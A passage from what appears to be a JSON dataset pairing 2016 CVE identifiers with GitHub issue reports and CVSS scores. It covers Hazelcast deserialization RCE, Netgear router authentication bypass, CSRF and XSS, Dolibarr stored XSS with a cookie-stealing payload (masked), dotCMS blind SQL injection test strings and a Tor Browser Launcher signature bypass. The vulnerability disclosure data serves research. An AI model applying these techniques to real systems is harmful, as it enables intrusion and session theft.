Stack partial redzone: f4 > Stack after return: f5 > Stack use after scope: f8 > Global redzone: f9 > Global init order: f6 > Poisoned by user: f7 > Container overflow: fc > Array cookie: ac > Intra object redzone: bb > APITAG internal: fe > Left alloca redzone: ca > Right alloca redzone: cb NUMBERTAG ABORTING >",
  2050. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2051. "severity": "CRITICAL",
  2052. "baseScore": 9.8,
  2053. "impactScore": 5.9,
  2054. "exploitabilityScore": 3.9
  2055. },
  2056. {
  2057. "CVE_ID": "CVE-2016-10750",
  2058. "Issue_Url_old": "https://github.com/hazelcast/hazelcast/issues/8024",
  2059. "Issue_Url_new": "https://github.com/hazelcast/hazelcast/issues/8024",
  2060. "Repo_new": "hazelcast/hazelcast",
  2061. "Issue_Created_At": "2016-04-26T20:29:27Z",
  2062. "description": "Hazelcast is vulnerable to untrusted deserialization remote code execution. I emailed the support address on April NUMBERTAG and received a response indicating that I should report my findings here. So here we are. The Hazelcast cluster join procedure is vulnerable to remote code execution due to Java deserialization. If an attacker can reach a listening Hazelcast instance with a crafted APITAG , and vulnerable classes are also on the classpath, the attacker can run arbitrary shell commands (among other nefarious things). Hazelcast will blindly deserialize any object it receives in that request stream. Since the APITAG is what implements authentication, this is necessarily pre authentication. This was verified against the latest code from the Git repository, as well as releases NUMBERTAG and NUMBERTAG I have a small whitelist/blacklist filter patch that I can submit a PR for, once I'm cleared to do so. I've already emailed the signed form. Or if you have another solution, feel free! If you choose to go the filtering route, the Hazelcast team should probably create a default whitelist for serialization, because blacklists are almost always out of date as soon as they are created.",
  2063. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2064. "severity": "HIGH",
  2065. "baseScore": 8.1,
  2066. "impactScore": 5.9,
  2067. "exploitabilityScore": 2.2
  2068. },
  2069. {
  2070. "CVE_ID": "CVE-2016-10937",
  2071. "Issue_Url_old": "https://github.com/lefcha/imapfilter/issues/142",
  2072. "Issue_Url_new": "https://github.com/lefcha/imapfilter/issues/142",
  2073. "Repo_new": "lefcha/imapfilter",
  2074. "Issue_Created_At": "2016-11-25T18:26:37Z",
  2075. "description": "No certificate verification. Apparently imapfilter is not checking the certificate after connecting to the imap server, or I am missing something. If the DNS is compromised by some hacker and imapfilter is directed to a fake IP address, the certificate supplied by that IP address will be accepted as valid if it is properly signed. What I mean is that if imapfilter is expecting to connect to APITAG and the server signed and valid certificate is from APITAG the connection will go through even if that is not the expected server. Apparently you have to use a SSL validate callback to solve that (SSL_CTX_set_verify)",
  2076. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  2077. "severity": "HIGH",
  2078. "baseScore": 7.5,
  2079. "impactScore": 3.6,
  2080. "exploitabilityScore": 3.9
  2081. },
  2082. {
  2083. "CVE_ID": "CVE-2016-11014",
  2084. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/14",
  2085. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/14",
  2086. "Repo_new": "cybersecurityworks/disclosed",
  2087. "Issue_Created_At": "2016-01-11T07:53:05Z",
  2088. "description": "Authentication Bypass in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Details ================ Product Vendor: Netgear Bug Name: Authentication Bypass in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Software: Netgear Router JNR NUMBERTAG Firmware Version NUMBERTAG Last Updated: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity High Status: APITAG Fixed APITAG POC Video URL: URLTAG Description ================ This flaw may allow a successful attacker to do anything gaining the privilege of the router being in LAN/WAN. Proof of concept: (POC) ================== APITAG Authentication & Session Management: APITAG APITAG Bypass: APITAG Try Accessing the URL which the normal user have no longer access without credentials with auth token value as \u201cok\u201d and HTTP Basic Authentication header with password value. APITAG Session Management: APITAG Create a fake Session ID and submit the request to the server with the credentials. Whereas, you can see that the session id has no change even after getting logged in and during logout process. FILETAG APITAG NUMBERTAG APITAG Session id created by an attacker before login FILETAG APITAG NUMBERTAG APITAG Attacker Session id is not changed even after login FILETAG APITAG NUMBERTAG APITAG Session id remains the same even after logging out from the current session. FILETAG APITAG NUMBERTAG APITAG Back button history of the accessed router after logging out FILETAG APITAG NUMBERTAG APITAG auth token is set to \u201cok\u201d once after logging into the router. But, we couldn\u2019t access any pages just by pressing back button after logging out FILETAG APITAG NUMBERTAG APITAG Changing the auth token value from \u201cok\u201d to \u201cnok\u201d and removing extra session tokens will give access to the unauthorized page with the same session id created by an attacker. FILETAG APITAG NUMBERTAG APITAG Authentication logic is bypassed and an attacker can access any pages inside login without credentials APITAG APITAG PATHTAG \u2013 Discovered in Netgear Router Firmware Version NUMBERTAG PATHTAG Reported to vendor through support option but, no response PATHTAG Reported to vendor through another support option available APITAG here APITAG . But, again no response. PATHTAG Finally, Technical Team started addressing about the issue after so many followups through phone/mail. PATHTAG Vulnerability got fixed & case was closed. PATHTAG Netgear Released updated Netgear Router JNR NUMBERTAG ersion NUMBERTAG APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  2089. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2090. "severity": "CRITICAL",
  2091. "baseScore": 9.8,
  2092. "impactScore": 5.9,
  2093. "exploitabilityScore": 3.9
  2094. },
  2095. {
  2096. "CVE_ID": "CVE-2016-11015",
  2097. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/13",
  2098. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/13",
  2099. "Repo_new": "cybersecurityworks/disclosed",
  2100. "Issue_Created_At": "2016-01-11T05:52:35Z",
  2101. "description": "Cross Site Request Forgery in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Details ================ Product Vendor: Netgear Bug Name: Cross Site Request Forgery in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Software: Netgear Router Firmware Version NUMBERTAG Last Updated: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity High Status: APITAG Fixed APITAG POC Video URL: URLTAG Description ================ Using this flaw, an attacker can cause victims to change any data the victim is allowed to change or perform any function the victim is authorized to use. Proof of concept: (POC) ================== Created a forged request changing the value of any variable, here it is APITAG APITAG APITAG variable in the URL URLTAG and sent it to victim forcing him/her to click on the malicious link generated by an attacker with different session allows an attacker to change the settings of the victim\u2019s router. FILETAG APITAG NUMBERTAG APITAG Blocked sites keywords before CSRF request sent to the victim FILETAG APITAG NUMBERTAG APITAG a CSRF Request is created by changing Block list URL variable FILETAG APITAG NUMBERTAG APITAG CSRF request is successfully submitted in the victims browser Note: Similarly, we can manipulate any request and can force victim to access the link generated by the attacker to make changes to the router settings without victim\u2019s knowledge. APITAG APITAG PATHTAG \u2013 Discovered in Netgear Router Firmware Version NUMBERTAG PATHTAG Reported to vendor through support option but, no response PATHTAG Reported to vendor through another support option available APITAG here APITAG . But, again no response. PATHTAG Finally, Technical Team started addressing about the issue after so many followups through phone/mail. PATHTAG Vulnerability got fixed & case was closed. PATHTAG Netgear Released updated version NUMBERTAG APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  2102. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  2103. "severity": "MEDIUM",
  2104. "baseScore": 6.5,
  2105. "impactScore": 3.6,
  2106. "exploitabilityScore": 2.8
  2107. },
  2108. {
  2109. "CVE_ID": "CVE-2016-11016",
  2110. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/12",
  2111. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/12",
  2112. "Repo_new": "cybersecurityworks/disclosed",
  2113. "Issue_Created_At": "2016-01-09T12:31:10Z",
  2114. "description": "Multiple Cross Site Scripting in Netgear Router Version NUMBERTAG Details ================ Product Vendor: Netgear Bug Name: Cross Site Scripting in Netgear Router Version NUMBERTAG Software: Netgear Router Firmware Version NUMBERTAG Last Updated: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity High Vulnerable URL: APITAG URLTAG APITAG Vulnerable Variable: APITAG getpage, var:page & var:menu APITAG Parameter: GET Status: APITAG Fixed APITAG Exploitation Requires Authentication?: no POC URL: URLTAG Description ================ Cross Site Scripting (XSS) vulnerability in Netgear Router Firmware Version NUMBERTAG By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies. This means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) ================== Inject the malicious APITAG code APITAG in the APITAG getpage APITAG variable in the URL APITAG URLTAG APITAG and viewing it on browser will result in execution of Cross Site Scripting (XSS) APITAG APITAG Similarly, APITAG var:page APITAG & APITAG var:menu APITAG variable is also injected with malicious APITAG payload and use it as a vehicle for further attack. APITAG NUMBERTAG APITAG The GET request parameter APITAG getpage APITAG variable in the following URL APITAG URLTAG APITAG is vulnerable to Cross Site Scripting (XSS). FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to APITAG getpage APITAG variable and its echoed back in the given response URL APITAG URLTAG APITAG FILETAG APITAG NUMBERTAG APITAG XSS Payload gets reflected in the browser APITAG NUMBERTAG APITAG The GET request parameter APITAG var:page APITAG variable in the following URL APITAG URLTAG APITAG is vulnerable to Cross Site Scripting (XSS). FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to APITAG var:page APITAG variable and its echoed back in the given response URL APITAG URLTAG APITAG APITAG NUMBERTAG APITAG The GET request parameter APITAG var:menu APITAG variable in the following URL APITAG URLTAG APITAG is vulnerable to Cross Site Scripting (XSS). FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to APITAG var:menu APITAG variable and its echoed back in the given response URL APITAG URLTAG APITAG APITAG APITAG PATHTAG \u2013 Discovered in Netgear Router Firmware Version NUMBERTAG PATHTAG Reported to vendor through support option but, no response PATHTAG Reported to vendor through another support option available APITAG here APITAG . But, again no response. PATHTAG Finally, Technical Team started addressing about the issue after so many followups through phone/mail. PATHTAG Vulnerability got fixed & case was closed. PATHTAG Netgear Released updated version NUMBERTAG APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  2115. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2116. "severity": "MEDIUM",
  2117. "baseScore": 6.1,
  2118. "impactScore": 2.7,
  2119. "exploitabilityScore": 2.8
  2120. },
  2121. {
  2122. "CVE_ID": "CVE-2016-11086",
  2123. "Issue_Url_old": "https://github.com/oauth-xx/oauth-ruby/issues/137",
  2124. "Issue_Url_new": "https://github.com/oauth-xx/oauth-ruby/issues/137",
  2125. "Repo_new": "oauth-xx/oauth-ruby",
  2126. "Issue_Created_At": "2016-12-01T21:59:31Z",
  2127. "description": "Certificate and chain not validated if certificate bundle cannot be found. While analysing the source code of some third party libraries we use in our projects, I found an issue with the way certificate validation is handled in this library. If the certificate bundle cannot be found on the file system at three known/specified locations, then it silently falls back to a mode (i.e. APITAG ) in which the certificate and the certificate chain aren't validated at all. See the following code fragments copied from APITAG . If the environment variable APITAG is not set, and no file can be found in the three specified locations, then APITAG is assigned nil . If you then look at the second code fragment, you can see that APITAG will be set to APITAG if APITAG equals nil and if the user hasn't explicitly set APITAG in the options object. Lines NUMBERTAG URLTAG : ERRORTAG Lines NUMBERTAG URLTAG : CODETAG I would expect a library to fail hard (i.e. throw an exception) in this case, and not silently fall back to an insecure mode. Also, it might be a good idea to embed a certificate bundle (e.g. FILETAG in the library itself. If no system certificate bundle can be found, then you could always fall back to the embedded certificate bundle. Let me know if you do have questions.",
  2128. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  2129. "severity": "HIGH",
  2130. "baseScore": 7.4,
  2131. "impactScore": 5.2,
  2132. "exploitabilityScore": 2.2
  2133. },
  2134. {
  2135. "CVE_ID": "CVE-2016-1133",
  2136. "Issue_Url_old": "https://github.com/h2o/h2o/issues/682",
  2137. "Issue_Url_new": "https://github.com/h2o/h2o/issues/682",
  2138. "Repo_new": "h2o/h2o",
  2139. "Issue_Created_At": "2016-01-07T09:22:38Z",
  2140. "description": "HTTP response splitting. Hi, I found out that i can do HTTP response splitting in h2o by feeding the URL with carriage return and new line (CRLF). Example: APITAG CODETAG the h2o config: ERRORTAG",
  2141. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
  2142. "severity": "LOW",
  2143. "baseScore": 3.7,
  2144. "impactScore": 1.4,
  2145. "exploitabilityScore": 2.2
  2146. },
  2147. {
  2148. "CVE_ID": "CVE-2016-1541",
  2149. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/656",
  2150. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/656",
  2151. "Repo_new": "libarchive/libarchive",
  2152. "Issue_Created_At": "2016-02-08T18:18:05Z",
  2153. "description": "Vulnerable code, CVETAG . Looking to responsibly disclose a vulnerability in libarchive that could permit arbitrary code execution. We have samples to support our discovery.",
  2154. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2155. "severity": "HIGH",
  2156. "baseScore": 8.8,
  2157. "impactScore": 5.9,
  2158. "exploitabilityScore": 2.8
  2159. },
  2160. {
  2161. "CVE_ID": "CVE-2016-1905",
  2162. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/19479",
  2163. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/19479",
  2164. "Repo_new": "kubernetes/kubernetes",
  2165. "Issue_Created_At": "2016-01-11T15:29:14Z",
  2166. "description": "api server: patch operation should use patched object to check admission control. Currently, patch will check admission control with an empty object and if it passes, then will proceed to update the object with the patch. Admission control plugins don't get a chance to see/validate what is actually going to be updated.",
  2167. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
  2168. "severity": "HIGH",
  2169. "baseScore": 7.7,
  2170. "impactScore": 4.0,
  2171. "exploitabilityScore": 3.1
  2172. },
  2173. {
  2174. "CVE_ID": "CVE-2016-1906",
  2175. "Issue_Url_old": "https://github.com/openshift/origin/issues/6556",
  2176. "Issue_Url_new": "https://github.com/openshift/origin/issues/6556",
  2177. "Repo_new": "openshift/origin",
  2178. "Issue_Created_At": "2016-01-06T19:23:45Z",
  2179. "description": "Can edit a build config to a strategy that isn't allowed by policy builds still fail correctly. If I apply the policy changes to restrict certain build strategies, I can create a BC with an allowed strategy and then edit the BC to use a restricted strategy, that edit should fail. Instead it allows the modification. It does still correctly prevent the builds from being launched.",
  2180. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2181. "severity": "CRITICAL",
  2182. "baseScore": 9.8,
  2183. "impactScore": 5.9,
  2184. "exploitabilityScore": 3.9
  2185. },
  2186. {
  2187. "CVE_ID": "CVE-2016-1912",
  2188. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/4341",
  2189. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/4341",
  2190. "Repo_new": "dolibarr/dolibarr",
  2191. "Issue_Created_At": "2016-01-06T18:37:07Z",
  2192. "description": "XSS vulnerability on latest version. Hi all, I don't think it's a good idea to post this here. But nobody respond to my mail and Dolibarr Official twitter account advise me to post this here ( URLTAG so ... Here is an advisory about XSS Vulnerability on Dolibarr latest version APITAG Exploit Title: XSS on dolibarr NUMBERTAG Date: PATHTAG Author: Mickael Dorigny @ Synetis Vendor or Software Link: FILETAG Category: XSS Vulnerability description : APITAG A Stored XSS is available in the Dolibarr NUMBERTAG core code. No module needs to be activated to exploit this XSS vulnerability because an attacker can use the user attributes management to do it. This XSS can be exploited through a basic user account on the dolibarr installation. Impacted users are administrators and users that have right to check other user's attributes. APITAG n NUMBERTAG Stored XSS in user attributes: APITAG Once a simple user is connected with his account, he can modifiy his attributes like Last name, First name, Mobile number, etc.. These informations can be reviewed by other users who have administration privileges. Note that some basic protection are present just after form submitting. These protection doesn't allow attacker to use basic APITAG tips like \" APITAG \" tags or \"onerror\" APITAG But some other events or still allowed. Using the APITAG HTML tag and the \"onmouseover\" APITAG event, we can force an admin to pass his mouse over the injected image. This event can be used to execute valid APITAG instructions in the administrator browser or in browser of other users allowed to check user's attributes. APITAG : As an authenticated user, fullfill APITAG name\", APITAG name\", \"email\", \"job\" or \"signature\" input with this : user1 APITAG [REQUEST] URLTAG [POSTDATA NUMBERTAG Content Disposition: form data; name=\"token\" APITAG NUMBERTAG Content Disposition: form data; name=\"action\" update NUMBERTAG Content Disposition: form data; name=\"entity NUMBERTAG Content Disposition: form data; name=\"lastname\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"photo\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"firstname\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"job\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"gender\" man NUMBERTAG Content Disposition: form data; name=\"login\" user NUMBERTAG Content Disposition: form data; name=\"password\" user NUMBERTAG Content Disposition: form data; name=\"admin NUMBERTAG Content Disposition: form data; name=\"superadmin NUMBERTAG Content Disposition: form data; name=\"office_phone NUMBERTAG Content Disposition: form data; name=\"user_mobile NUMBERTAG Content Disposition: form data; name=\"office_fa NUMBERTAG Content Disposition: form data; name=\"email\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"signature\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"fk_user NUMBERTAG Content Disposition: form data; name=\"weeklyhours NUMBERTAG Content Disposition: form data; name=\"save\" Save NUMBERTAG Note that APITAG name\" and APITAG name\" input are displayed in the APITAG of users\" page, but they are truncated after NUMBERTAG characters. This trunctation limits available XSS payloads. We can use the \"signature\" input to insert more APITAG instructions in the same HTML form. Admin will then see this signature when they will click on a user in the APITAG of users\" to see all his attributes. Image insertion can target an existent or a non existent image. A little tips to have more chance to trap an admin is to upload a very big image (like NUMBERTAG that will cover all the website page. Once attributes are modified. Another user like an admin can check your attributes and then execute APITAG instruction by passing his mouse over the injected image. Here is another Poc that will send the admin's cookie on a website controled by an attacker using a GET HTTP request. Inject this payload in the \"signature\" input : APITAG Using this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such as cookies. This is a APITAG Video made by myself to expose the most dangerous usage of this vulnerability : URLTAG Feel free to ask more details if needed.",
  2193. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  2194. "severity": "MEDIUM",
  2195. "baseScore": 5.4,
  2196. "impactScore": 2.7,
  2197. "exploitabilityScore": 2.3
  2198. },
  2199. {
  2200. "CVE_ID": "CVE-2016-2169",
  2201. "Issue_Url_old": "https://github.com/cloudfoundry/cloud_controller_ng/issues/568",
  2202. "Issue_Url_new": "https://github.com/cloudfoundry/cloud_controller_ng/issues/568",
  2203. "Repo_new": "cloudfoundry/cloud_controller_ng",
  2204. "Issue_Created_At": "2016-03-23T13:54:24Z",
  2205. "description": "CAPI shouldn't allow users to create apps with routes matching CF service subdomains. Today we stumbled upon a very interesting bug within CAPI, which I spoke about with MENTIONTAG on the APITAG APITAG Source) Slack. We were experiencing HTTP ERRORTAG errors approximately NUMBERTAG of the time when connecting to the UAA via the CF CLI. We also had similar errors with one of our internal services using the cf java client URLTAG , which gave us errors such as ERRORTAG Turns out that one of our users has created an app with route APITAG , and that caused this behaviour. Since you can have multiple apps with the same domain bound on it, CF is nicely load balancing traffic to the 'real' APITAG (the UAA) and the user's app, which makes this fail the NUMBERTAG of the time my CF CLI or APITAG hits the user's app instead of the actual UAA. In our case, the user was not a malicious user, but it would be pretty straight forward to inject a APITAG Always\u201d application that listens on the same route as the UAA, which would then catch/receive UAA APITAG tokens. In the case of the APITAG (and also the CF CLI) I think it makes sense they don't block this kind of behaviour, as they will just act as a pure passthrough for anything you request. However, I believe that CF should block the ability to use the same route as the UAA though for security reasons. In a default (stock) CF release installation, we believe this should (probably) at least be blocked for these CF service subdomains, if this has not already been done: APITAG APITAG / APITAG APITAG APITAG APITAG We think that this might be a CAPI (security) issue. MENTIONTAG will also ask MENTIONTAG about this in person.",
  2206. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  2207. "severity": "MEDIUM",
  2208. "baseScore": 5.3,
  2209. "impactScore": 1.4,
  2210. "exploitabilityScore": 3.9
  2211. },
  2212. {
  2213. "CVE_ID": "CVE-2016-2183",
  2214. "Issue_Url_old": "https://github.com/ssllabs/ssllabs-scan/issues/387",
  2215. "Issue_Url_new": "https://github.com/ssllabs/ssllabs-scan/issues/387",
  2216. "Repo_new": "ssllabs/ssllabs-scan",
  2217. "Issue_Created_At": "2016-08-24T16:38:48Z",
  2218. "description": "SWEET NUMBERTAG triple DES should now be considered as \u201cbad\u201d as RC4.. URLTAG I think NUMBERTAG DES should be flagged INSECURE, as RC4 are.",
  2219. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  2220. "severity": "HIGH",
  2221. "baseScore": 7.5,
  2222. "impactScore": 3.6,
  2223. "exploitabilityScore": 3.9
  2224. },
  2225. {
  2226. "CVE_ID": "CVE-2016-2230",
  2227. "Issue_Url_old": "https://github.com/RasPlex/RasPlex/issues/453",
  2228. "Issue_Url_new": "https://github.com/rasplex/rasplex/issues/453",
  2229. "Repo_new": "rasplex/rasplex",
  2230. "Issue_Created_At": "2015-12-27T13:27:27Z",
  2231. "description": "SSH insecure by default. SSH is enabled by default, the default login details are widely published. People are exposing their APITAG installs to the web. Even if they aren't putting them in a DMZ, or otherwise exposing them to the web, it's still horribly insecure by default. Bizarrely, you're prevented from changing the default password because passwd is missing. Possible solutions: a) Make SSH off by default, force a password to be set the first time SSH is enabled b) Generate a random password and show it in settings.",
  2232. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2233. "severity": "CRITICAL",
  2234. "baseScore": 9.8,
  2235. "impactScore": 5.9,
  2236. "exploitabilityScore": 3.9
  2237. },
  2238. {
  2239. "CVE_ID": "CVE-2016-2355",
  2240. "Issue_Url_old": "https://github.com/dotCMS/core/issues/8848",
  2241. "Issue_Url_new": "https://github.com/dotcms/core/issues/8848",
  2242. "Repo_new": "dotcms/core",
  2243. "Issue_Created_At": "2016-04-08T02:58:46Z",
  2244. "description": "SQL Injection Vulnerability. Attack details url: URLTAG APITAG URL encoded POST input APITAG was set to NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG Tests performed NUMBERTAG OR NUMBERTAG or APITAG => TRUE NUMBERTAG OR NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG APITAG FALSE NUMBERTAG OR NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => TRUE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => TRUE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => TRUE Original value: APITAG Parameter: APITAG (POST) Type: boolean based blind Title: AND boolean based blind WHERE or HAVING clause Payload: APITAG EMAILTAG APITAG AND NUMBERTAG AND APITAG",
  2245. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2246. "severity": "CRITICAL",
  2247. "baseScore": 9.8,
  2248. "impactScore": 5.9,
  2249. "exploitabilityScore": 3.9
  2250. },
  2251. {
  2252. "CVE_ID": "CVE-2016-2515",
  2253. "Issue_Url_old": "https://github.com/hueniverse/hawk/issues/168",
  2254. "Issue_Url_new": "https://github.com/mozilla/hawk/issues/168",
  2255. "Repo_new": "mozilla/hawk",
  2256. "Issue_Created_At": "2016-01-19T19:53:51Z",
  2257. "description": "Long headers or uris can cause minor APITAG Reported by MENTIONTAG",
  2258. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2259. "severity": "HIGH",
  2260. "baseScore": 7.5,
  2261. "impactScore": 3.6,
  2262. "exploitabilityScore": 3.9
  2263. },
  2264. {
  2265. "CVE_ID": "CVE-2016-3180",
  2266. "Issue_Url_old": "https://github.com/micahflee/torbrowser-launcher/issues/229",
  2267. "Issue_Url_new": "https://github.com/micahflee/torbrowser-launcher/issues/229",
  2268. "Repo_new": "micahflee/torbrowser-launcher",
  2269. "Issue_Created_At": "2016-03-13T21:49:44Z",
  2270. "description": "Signature verification bypass attack. Jann Horn reported a clever security issue that lets an attacker bypass PGP signature verification. Because Tor Browser Launcher uses defense in depth, an attacker would need to combine this attack with other attacks before they could succeed in an exploit. Specifically, they would need to be in a position to man in the middle the download and also defeat the HTTPS connection to FILETAG or one of the mirrors. The first time you run Tor Browser Launcher, it works like this: Downloads URLTAG to learn the current stable version of Tor Browser Uses the version, as well as the mirror URL (defaults to URLTAG to build URLs to download the APITAG file (I'll call it $tarball) and APITAG ($sigfile), and downloads them both Verifies the signature by running: APITAG The problem is that APITAG can be ambiguous. If $sigfile is APITAG , it can either mean that that's a detached signature and the content is in APITAG , or it can mean that it's the content is included in the same file. If an attacker can MITM connections to FILETAG or whatever mirror is set, and their MITM server uses a trusted certificate, then they can replace $sigfile with a single file that contains the valid Tor Browser tarball and signature, and replace $tarball with something malicious but completely unsigned. When Tor Browser Launcher downloads $sigfile and verifies it, the verification will succeed and it will extract $tarball and execute APITAG , which will let the attack run their arbitrary code as the current user (they could even launch a legit Tor Browser if they want to be stealthy). The solution is to specify the content as well as the signature file when verifying the signature, e.g.: APITAG",
  2271. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2272. "severity": "HIGH",
  2273. "baseScore": 8.1,
  2274. "impactScore": 5.9,
  2275. "exploitabilityScore": 2.2
  2276. },
  2277. {
  2278. "CVE_ID": "CVE-2016-3182",
  2279. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/725",
  2280. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/725",
  2281. "Repo_new": "uclouvain/openjpeg",
  2282. "Issue_Created_At": "2016-03-16T10:05:18Z",
  2283. "description": "Heap Corruption in opj_free function. URLTAG URLTAG",
  2284. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2285. "severity": "MEDIUM",
  2286. "baseScore": 5.5,
  2287. "impactScore": 3.6,
  2288. "exploitabilityScore": 1.8
  2289. },
  2290. {
  2291. "CVE_ID": "CVE-2016-3183",
  2292. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/726",
  2293. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/726",
  2294. "Repo_new": "uclouvain/openjpeg",
  2295. "Issue_Created_At": "2016-03-16T10:05:56Z",
  2296. "description": "Out Of Bounds Read in sycc NUMBERTAG to_rgb function. URLTAG URLTAG",
  2297. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2298. "severity": "MEDIUM",
  2299. "baseScore": 5.5,
  2300. "impactScore": 3.6,
  2301. "exploitabilityScore": 1.8
  2302. },
  2303. {
  2304. "CVE_ID": "CVE-2016-3674",
  2305. "Issue_Url_old": "https://github.com/x-stream/xstream/issues/25",
  2306. "Issue_Url_new": "https://github.com/x-stream/xstream/issues/25",
  2307. "Repo_new": "x-stream/xstream",
  2308. "Issue_Created_At": "2015-09-07T08:53:09Z",
  2309. "description": "XXE vulnerability . DTD processing was enabled and therefore, XML deserialization process was vulnerable to XML External Entity Injection (I was able to expose local files). URLTAG Suggestion is to ignore client side DOCTYPE declarations.",
  2310. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  2311. "severity": "HIGH",
  2312. "baseScore": 7.5,
  2313. "impactScore": 3.6,
  2314. "exploitabilityScore": 3.9
  2315. },
  2316. {
  2317. "CVE_ID": "CVE-2016-3697",
  2318. "Issue_Url_old": "https://github.com/docker/docker/issues/21436",
  2319. "Issue_Url_new": "https://github.com/moby/moby/issues/21436",
  2320. "Repo_new": "moby/moby",
  2321. "Issue_Created_At": "2016-03-23T18:08:09Z",
  2322. "description": "Numeric user id passed to user interpreted as user name if user name is numeric in container /etc/passwd. Output of docker version : CODETAG Output of docker info : ERRORTAG Additional environment details (AWS, APITAG physical, etc.): Running under APITAG through Vagrant. Steps to reproduce the issue NUMBERTAG On docker host: APITAG NUMBERTAG In the just started container: APITAG NUMBERTAG In another terminal on the same docker host: APITAG Describe the results you received: APITAG Describe the results you expected: It should show my user id as NUMBERTAG not NUMBERTAG Additional information you deem important (e.g. issue happens only occasionally): This could let image creators create malicious images which when run with a specific user id grant root in the container, and thus root to any mounted volumes.",
  2323. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  2324. "severity": "HIGH",
  2325. "baseScore": 7.8,
  2326. "impactScore": 5.9,
  2327. "exploitabilityScore": 1.8
  2328. },
  2329. {
  2330. "CVE_ID": "CVE-2016-3735",
  2331. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/470",
  2332. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/470",
  2333. "Repo_new": "piwigo/piwigo",
  2334. "Issue_Created_At": "2016-04-26T09:03:40Z",
